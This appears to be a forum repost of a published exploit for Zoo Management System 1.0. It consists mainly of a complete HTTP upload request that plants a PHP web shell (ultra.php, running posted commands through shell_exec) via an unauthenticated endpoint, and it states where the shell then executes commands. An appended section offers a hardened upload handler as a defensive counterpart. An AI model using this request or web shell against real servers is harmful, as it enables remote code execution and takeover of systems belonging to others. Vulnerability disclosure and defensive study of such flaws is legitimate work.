Zoo Management System 1.0 - Unauthenticated RCE

HackApt-37 Team, verified member

Hacker Warehouse webmaster

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/...-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/down...+Code+Code+Code+php+php+with+mysql+datatabase
# Version: 1.0
# Tested on: Windows 11

## Unauthenticated users can access the /zoomanagementsystem/admin/public_html/save_animal address and upload a malicious PHP file instead of an animal picture, without any authentication.

POST /Zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8ny8zt5dxiloiuml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/Zoomanagementsystem/admin/public/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="Animal_id"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_given_name"

KDKD
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_species_name"

ıdsıd
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_dob"

1552-02-05
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_gender"

m
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_avg_lifespan"

3
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="class_id"

2
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="location_id"

2
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_dietary_req"

2
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_natural_habitat"

法德
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_pop_dist"

terter
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_joindate"

5559-02-06
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_height"

2
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_weight"

3
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_description"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream

<?php
if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>
* {
    -webkit-box-sizing: border-box;
    box-sizing: border-box;
}
body {
    font-family: sans-serif;
    color: rgba(0, 0, 0, .75);
}
main {
    margin: auto;
    max-width: 850px;
}
pre,
input,
button {
    padding: 10px;
    border-radius: 5px;
    background-color: #efefefef;
}
label {
    display: block;
}
input {
    width: 100%;
    background-color: #efefefef;
    border: 2px solid transparent;
}
input:focus {
    outline: none;
    background: transparent;
    border: 2px solid #e6e6e6;
}
button {
    border: none;
    cursor: pointer;
    margin: 5px;
}
button:hover {
    background-color: #e6e6e6;
}
.form-group {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    padding: 15px 0;
}
</style>
</head>
<body>
<main>
<h1>Web Shell</h1>
<h2>Execute command</h2>
<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
onfocus="this.setSelectionRange(this.value.length, this.value.length);" required autofocus>
<button type="submit">Execute</button>
</div>
</form>

<h2>Output</h2>
<?php if (isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
</main>
</body>
</html>
------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_med_record"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_transfer"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_transfer_reason"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_death_date"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_death_cause"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="an_incineration"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="m_gest_period"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="m_category"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="m_avg_body_temp"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="b_nest_const"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="b_clutch_size"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="b_wingspan"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="b_color_variant"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="f_body_temp"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="f_water_type"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="f_color_variant"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="rep_type"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="clutch_size"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="num_offspring"


------WebKitFormBoundary8ny8zt5dxiloiuml
Content-Disposition: form-data; name="submit"


------WebKitFormBoundary8ny8zt5dxiloiuml--

## After the attacker sends the POST request, the malicious file can execute arbitrary commands at http://localhost/Zoomanagementsyste...system/img/abily/ultra_1697442648.php.
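
A hardened counterpart to the upload endpoint described above, as an added example that is not part of the original post or of the application's own code. It rejects unauthenticated requests and stores only files whose content is a JPEG, PNG or GIF, under a server-chosen name. The session key `admin_id`, the `UPLOAD_DIR` location and the helper `store_image_upload()` are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical names (not from the application): $_SESSION['admin_id'],
// UPLOAD_DIR, store_image_upload(). The form field images[] is from the request above.
const UPLOAD_DIR = __DIR__ . '/../uploads/animals'; // assumed layout, PHP execution disabled here
const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

function store_image_upload(string $tmpPath, int $error): ?string
{
    if ($error !== UPLOAD_ERR_OK || !is_uploaded_file($tmpPath)) {
        return null;
    }
    // Decide the type from the file content, never from the client filename or Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    $ext = ALLOWED[(string) $mime] ?? null;
    if ($ext === null || getimagesize($tmpPath) === false) {
        return null;
    }
    // Random server-side name and allowlisted extension: a client-supplied
    // "ultra.php" never reaches disk with an executable extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($tmpPath, UPLOAD_DIR . '/' . $name) ? $name : null;
}

session_start();
if (empty($_SESSION['admin_id'])) {   // reject unauthenticated requests first
    http_response_code(403);
    exit('Forbidden');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_FILES['images'])) {
    http_response_code(400);
    exit('Bad request');
}
$stored = [];
foreach ($_FILES['images']['tmp_name'] as $i => $tmp) {
    $name = store_image_upload((string) $tmp, (int) $_FILES['images']['error'][$i]);
    if ($name === null) {
        http_response_code(422);
        exit('Rejected: not a valid JPEG, PNG or GIF image');
    }
    $stored[] = $name;
}
echo json_encode(['stored' => $stored]);
```

A file that is a valid image with PHP appended still passes the content check, so the forced image extension and a web-server rule that disables script execution in the upload directory remain necessary.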
 